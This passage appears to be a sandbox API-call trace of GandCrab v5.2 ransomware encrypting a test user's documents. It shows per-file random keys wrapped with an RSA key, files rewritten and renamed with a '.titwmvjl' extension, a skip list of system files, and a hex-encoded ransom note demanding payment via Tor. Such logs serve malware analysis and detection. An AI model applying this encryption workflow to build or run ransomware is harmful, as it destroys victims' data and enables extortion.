lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.521] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.521] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.521] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.522] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.522] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.522] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.522] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.522] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.523] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.523] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.523] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.524] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.524] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.524] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.525] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.525] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.525] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.525] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.526] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0089.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.526] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.526] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.527] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.527] GetLastError () returned 0x0 [0089.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.527] CryptDestroyKey (hKey=0x5034f8) returned 1 [0089.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.528] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.528] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.529] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0089.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.529] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.529] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.530] GetLastError () returned 0x0 [0089.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.530] CryptDestroyKey (hKey=0x5034f8) returned 1 [0089.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.530] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.530] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.530] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.530] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x5502, lpOverlapped=0x0) returned 1 [0089.536] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffaafe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.536] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5502, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x5502, lpOverlapped=0x0) returned 1 [0089.537] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.538] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.542] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.542] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.542] CloseHandle (hObject=0x2ac) returned 1 [0089.543] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5dbxkrwn.xlsx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5DbxKRWN.xlsx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5dbxkrwn.xlsx.titwmvjl"), dwFlags=0x1) returned 1 [0089.544] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.544] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.544] lstrcmpW (lpString1="5EgiP9Nox7h.pptx", lpString2=".") returned 1 [0089.544] lstrcmpW (lpString1="5EgiP9Nox7h.pptx", lpString2="..") returned 1 [0089.544] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="5EgiP9Nox7h.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx" [0089.544] lstrlenW (lpString=".titwmvjl") returned 9 [0089.544] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned 48 [0089.544] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.544] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx.titwmvjl") returned 57 [0089.544] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned 48 [0089.544] lstrlenW (lpString=".pptx") returned 5 [0089.544] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.544] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".pptx ") returned 6 [0089.544] lstrcmpiW (lpString1=".pptx", lpString2=".titwmvjl") returned -1 [0089.544] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned 48 [0089.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned 48 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="desktop.ini") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="autorun.inf") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="ntuser.dat") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="iconcache.db") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="bootsect.bak") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="boot.ini") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="ntuser.dat.log") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="thumbs.db") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="CRAB-DECRYPT.html") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="ntldr") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="NTDETECT.COM") returned -1 [0089.545] lstrcmpiW (lpString1="5EgiP9Nox7h.pptx", lpString2="Bootfont.bin") returned -1 [0089.545] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx") returned 48 [0089.545] lstrlenW (lpString=".pptx") returned 5 [0089.545] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.545] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pptx ") returned 6 [0089.545] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.545] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.546] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5egip9nox7h.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0089.546] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.546] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0089.547] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.547] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.547] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.548] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.548] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.548] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.548] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0089.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.548] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.548] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.549] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.549] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0089.550] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.550] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.550] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.550] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0089.550] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.550] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.550] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.551] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.552] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0089.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.552] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.552] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.552] GetLastError () returned 0x0 [0089.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.553] CryptDestroyKey (hKey=0x503378) returned 1 [0089.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.553] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.553] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0089.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.554] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0089.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.554] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0089.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.554] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0089.555] GetLastError () returned 0x0 [0089.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.555] CryptDestroyKey (hKey=0x503378) returned 1 [0089.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.555] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.555] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.555] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.555] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x876a, lpOverlapped=0x0) returned 1 [0089.618] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff7896, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.618] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x876a, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x876a, lpOverlapped=0x0) returned 1 [0089.619] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0089.620] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.625] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.626] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.626] CloseHandle (hObject=0x2ac) returned 1 [0089.627] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5egip9nox7h.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\5EgiP9Nox7h.pptx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\5egip9nox7h.pptx.titwmvjl"), dwFlags=0x1) returned 1 [0089.627] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.628] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0089.628] lstrcmpW (lpString1="9BBF2RyCvM", lpString2=".") returned 1 [0089.628] lstrcmpW (lpString1="9BBF2RyCvM", lpString2="..") returned 1 [0089.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="9BBF2RyCvM" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM" [0089.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\" [0089.628] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.628] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.629] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.629] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.629] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.629] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\\\TITWMVJL-DECRYPT.txt") returned 64 [0089.629] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0089.629] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x